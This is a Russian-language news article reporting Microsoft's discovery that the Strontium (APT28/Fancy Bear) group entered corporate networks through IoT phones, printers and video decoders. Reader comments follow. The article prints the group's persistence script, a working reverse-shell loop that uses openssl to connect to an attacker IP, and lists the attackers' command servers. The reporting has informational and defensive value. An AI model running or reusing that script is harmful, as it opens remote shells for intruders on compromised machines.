Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей» Статьи редакции

Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.

Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.

В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.

Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.

После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.

—contents of [IOT Device] file--

#!/bin/sh

export [IOT Device] ="-qws -display :1 -nomouse"

echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host

167.114.153.55 -port 443 |while : ; do sh && break; done| openssl

s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&

cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];

then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &

--end contents of file--

скрипт для поддержания присутствия хакеров в сети

В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.

Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.

Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.

{ "author_name": "Дамир Камалетдинов", "author_type": "editor", "tags": ["\u0445\u0430\u043a\u0435\u0440\u044b","\u043d\u043e\u0432\u043e\u0441\u0442\u0438","\u0430\u0442\u0430\u043a\u0438","microsoft"], "comments": 10, "likes": 19, "favorites": 3, "is_advertisement": false, "subsite_label": "news", "id": 110066, "is_wide": false, "is_ugc": false, "date": "Tue, 06 Aug 2019 20:17:37 +0300", "is_special": false }
0
10 комментариев
Популярные
По порядку
Написать комментарий...

Милый браслет

–4

А может мне кто объяснить нафига принтер и телефон в интернет вытаскивать ?
PS Всё что надо знать про IoT, благодаря безумству маркетолог теперь можно взломать микрософт через чайник.

Ответить

Талантливый коктейль

Милый
4

поскольку 99% IOT делают голожопые стартаперы дырок там немеряно

Ответить
3

Комментарий удален по просьбе пользователя

Ответить

Милый браслет

Илюхер
0

Хреново понимаешь.

Ответить

Милый браслет

Илюхер
–1

Причем тут офис ?

Ответить
0

Комментарий удален по просьбе пользователя

Ответить

Милый браслет

Илюхер
0

Ты айтишник из местной группы детсада ?
Иначе у тебя не было бы глупых вопросов.
" нафига принтер и телефон в интернет вытаскивать "

Ответить

Милый браслет

Илюхер
0

Бля даже в их посте всё есть.

Recommendations for Securing Enterprise IoT

There are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:

Require approval and cataloging of any IoT devices running in your corporate environment.
Develop a custom security policy for each IoT device.
Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.
Use a separate network for IoT devices if feasible.
Conduct routine configuration/patch audits against deployed IoT devices.
Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.
Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.
Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).
Audit any identities and credentials that have authorized access to IoT devices, users and processes.
Centralize asset/configuration/patch management if feasible.
If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.
Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.

Ответить
0

Произошёл взлом жопы

Ответить
0

Это все чайники.

Ответить
Обсуждаемое
Новости
Американская НКО подала иск к Apple и потребовала удалить Telegram из App Store из-за «экстремистских» сообщений
Это произошло на фоне роста популярности мессенджера.
Интернет
Резонанс: «Дворец Путина» с казино, кальянной, складом грязи, игровыми автоматами и шестом для стриптиза
Все внимание соцсетей — на особняк из расследования Навального, который построен будто бы в Sims со всеми читами.
Интернет
«Когда беспредел становится нормой, его жертвами часто становятся вообще все»: Дудь написал пост о суде над Навальным
Политик давал интервью блогеру два раза, в том числе после отравления.
Популярное за три дня
Новости
«Не бойтесь»: Навальный после ареста выпустил обращение с призывом выходить на протесты
Штаб политика запланировал большие акции на 23 января.
Новости
Навального арестовали на 30 суток сразу после возвращения в Россию. Заседание прошло в отделе полиции
Журналистов не пускали в здание, а сам политик счёл происходящее «наивысшей степени беззаконием».
Новости
Алексея Навального задержали после возвращения в Россию
На паспортном контроле в Шереметьево.

Комментарии

null